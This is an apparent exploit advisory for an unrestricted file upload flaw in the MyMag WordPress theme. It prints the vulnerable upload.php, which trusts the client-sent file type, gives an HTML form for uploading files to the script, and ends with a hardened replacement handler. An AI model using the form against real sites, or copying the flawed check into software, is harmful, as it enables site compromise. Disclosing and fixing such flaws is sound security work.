MyMag wordpress theme Unrestricted File Upload

Posted on 30 November -0001

upload.php:

Code:

    $dir = "images/logos/";
    $url = $_POST['url'];   // request-supplied value, used in the redirect below
    if (is_writable($dir)) {
        // The only type check is on $_FILES["file"]["type"], a value sent by the client.
        if ((($_FILES["file"]["type"] == "image/gif")
            || ($_FILES["file"]["type"] == "image/jpeg")
            || ($_FILES["file"]["type"] == "image/png")
            || ($_FILES["file"]["type"] == "image/pjpeg"))
            && ($_FILES["file"]["size"] < 1048576)) {
            if ($_FILES["file"]["error"] > 0) {
                echo "Return Code: " . $_FILES["file"]["error"] . "<br />";
            } else {
                $_FILES["file"]["name"] = str_replace(' ', '_', $_FILES["file"]["name"]);
                if (file_exists($dir . $_FILES["file"]["name"])) {
                    echo $_FILES["file"]["name"] . " already exists. ";
                } else {
                    // The extension is chosen from the same client-sent type.
                    switch ($_FILES["file"]["type"]) {
                        case "image/jpeg": $end = ".jpg"; break;
                        case "image/png":  $end = ".png"; break;
                        case "image/gif":  $end = ".gif"; break;
                    }
                    $newname = time() . $end;
                    move_uploaded_file($_FILES["file"]["tmp_name"], $dir . $newname);
                    $file = $newname;
                    $admin = "/wp-admin/themes.php?page=functions.php&pic=";
                    header("Location: $url$admin$file");
                }
            }
        }
    }

Page: /wp-content/themes/mymag/upload.php

To exploit:

    <html>
    <body>
    <form action="http://localhost/wp-content/themes/mymag/upload.php" method="post" enctype="multipart/form-data">
    <label for="file">Filename:</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="Submit">
    </form>
    </body>
    </html>

Upload the file through the form and submit it. The file will be uploaded to http://localhost/wp-content/themes/mymag/images/logos
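For comparison with upload.php above, a hardened handler that decides the file type from the uploaded bytes instead of $_FILES["file"]["type"] and picks the stored name on the server. This is an added example, not code from the MyMag theme or its author. It assumes the hypothetical function store_logo_upload() is called only after the caller has confirmed the request comes from an authorised WordPress administrator, and that $destDir is the theme's images/logos/ directory.

```php
<?php
// Added example: server-side validation for a logo upload (not the theme's code).
// Hypothetical names: ALLOWED_TYPES, store_logo_upload().

const ALLOWED_TYPES = [
    'image/jpeg' => '.jpg',
    'image/png'  => '.png',
    'image/gif'  => '.gif',
];

// Returns the stored file name, or null if the upload is rejected.
function store_logo_upload(array $file, string $destDir): ?string
{
    // Reject failed uploads and anything that did not arrive via HTTP POST.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // Same 1 MiB limit as the original, measured on the stored temp file.
    if (filesize($file['tmp_name']) >= 1048576) {
        return null;
    }

    // Detect the type from the file's content; $file['type'] is never read.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!is_string($mime) || !array_key_exists($mime, ALLOWED_TYPES)) {
        return null;
    }

    // The content must also parse as an image.
    if (@getimagesize($file['tmp_name']) === false) {
        return null;
    }

    // Server-chosen name: random stem, extension taken from the detected type only.
    $name = bin2hex(random_bytes(16)) . ALLOWED_TYPES[$mime];
    $dest = rtrim($destDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    return $name;
}
```

Any redirect after a successful upload should go to a fixed admin URL rather than one built from $_POST['url'].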

 
